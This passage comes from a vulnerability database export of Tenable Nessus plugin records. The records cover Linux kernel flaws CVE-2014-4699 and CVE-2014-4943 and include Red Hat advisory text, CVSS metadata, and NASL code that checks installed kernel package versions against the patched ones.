and\npppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP\nimplementation handled requests with a non-SOL_PPPOL2TP socket option\nlevel. A local, unprivileged user could use this flaw to escalate\ntheir privileges on the system. (CVE-2014-4943, Important)\n\nThe system must be rebooted for this update to take effect.\"\n );\n # http://listserv.fnal.gov/scripts/wa.exe?A2=ind1407&L=scientific-linux-errata&T=0&P=2277\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b6c39e8e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"kernel-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-abi-whitelists-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-debuginfo-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-devel-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debuginfo-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"kernel-debuginfo-common-i686-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-devel-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-doc-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-firmware-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-headers-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-debuginfo-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-2.6.32-431.20.5.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-debuginfo-2.6.32-431.20.5.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-07-30T13:58:54", "references": ["http://rhn.redhat.com/errata/RHSA-2014-0924.html", "https://www.redhat.com/security/data/cve/CVE-2014-4699.html", "https://www.redhat.com/security/data/cve/CVE-2014-4943.html"], "pluginID": "76750", "description": "Updated kernel packages that fix two security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a traced process' instruction pointer to be set to a non-canonical memory address without forcing the non-sysret code path when returning to user space. A local, unprivileged user could use this flaw to crash the system or, potentially, escalate their privileges on the system.\n(CVE-2014-4699, Important)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel CPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and pppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP implementation handled requests with a non-SOL_PPPOL2TP socket option level. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting CVE-2014-4699, and Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.", "edition": 4, "reporter": "Tenable", "published": "2014-07-24T00:00:00", "title": "RHEL 6 : kernel (RHSA-2014:0924)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2018-07-26T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:python-perf", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686"], "id": "REDHAT-RHSA-2014-0924.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76750", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0924. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76750);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/26 18:45:29\");\n\n script_cve_id(\"CVE-2014-4699\", \"CVE-2014-4943\");\n script_bugtraq_id(68411, 68683);\n script_xref(name:\"RHSA\", value:\"2014:0924\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2014:0924)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix two security issues are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a\ntraced process' instruction pointer to be set to a non-canonical\nmemory address without forcing the non-sysret code path when returning\nto user space. A local, unprivileged user could use this flaw to crash\nthe system or, potentially, escalate their privileges on the system.\n(CVE-2014-4699, Important)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel\nCPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and\npppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP\nimplementation handled requests with a non-SOL_PPPOL2TP socket option\nlevel. A local, unprivileged user could use this flaw to escalate\ntheir privileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting\nCVE-2014-4699, and Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2014-4699.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2014-4943.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2014-0924.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0924\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-abi-whitelists-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debuginfo-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-devel-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-devel-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-doc-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-firmware-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-headers-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-headers-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perf-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perf-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perf-debuginfo-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perf-debuginfo-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-debuginfo-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"python-perf-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"python-perf-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-perf-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"python-perf-debuginfo-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"python-perf-debuginfo-2.6.32-431.20.5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-2.6.32-431.20.5.el6\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-07-30T14:05:54", "references": ["https://www.redhat.com/security/data/cve/CVE-2014-4699.html", "http://rhn.redhat.com/errata/RHSA-2014-0925.html", "https://www.redhat.com/security/data/cve/CVE-2014-4943.html"], "pluginID": "79111", "description": "Updated kernel packages that fix two security issues are now available for Red Hat Enterprise Linux 6.4 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a traced process' instruction pointer to be set to a non-canonical memory address without forcing the non-sysret code path when returning to user space. A local, unprivileged user could use this flaw to crash the system or, potentially, escalate their privileges on the system.\n(CVE-2014-4699, Important)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel CPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and pppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP implementation handled requests with a non-SOL_PPPOL2TP socket option level. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting CVE-2014-4699, and Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.", "edition": 4, "reporter": "Tenable", "published": "2014-11-11T00:00:00", "title": "RHEL 6 : kernel (RHSA-2014:0925)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "modified": "2018-07-26T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:python-perf", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686"], "id": "REDHAT-RHSA-2014-0925.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79111", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0925. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79111);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/26 18:45:29\");\n\n script_cve_id(\"CVE-2014-4699\", \"CVE-2014-4943\");\n script_xref(name:\"RHSA\", value:\"2014:0925\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2014:0925)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix two security issues are now available\nfor Red Hat Enterprise Linux 6.4 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a\ntraced process' instruction pointer to be set to a non-canonical\nmemory address without forcing the non-sysret code path when returning\nto user space. A local, unprivileged user could use this flaw to crash\nthe system or, potentially, escalate their privileges on the system.\n(CVE-2014-4699, Important)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel\nCPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and\npppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP\nimplementation handled requests with a non-SOL_PPPOL2TP socket option\nlevel. A local, unprivileged user could use this flaw to escalate\ntheir privileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting\nCVE-2014-4699, and Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2014-4699.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2014-4943.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2014-0925.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n 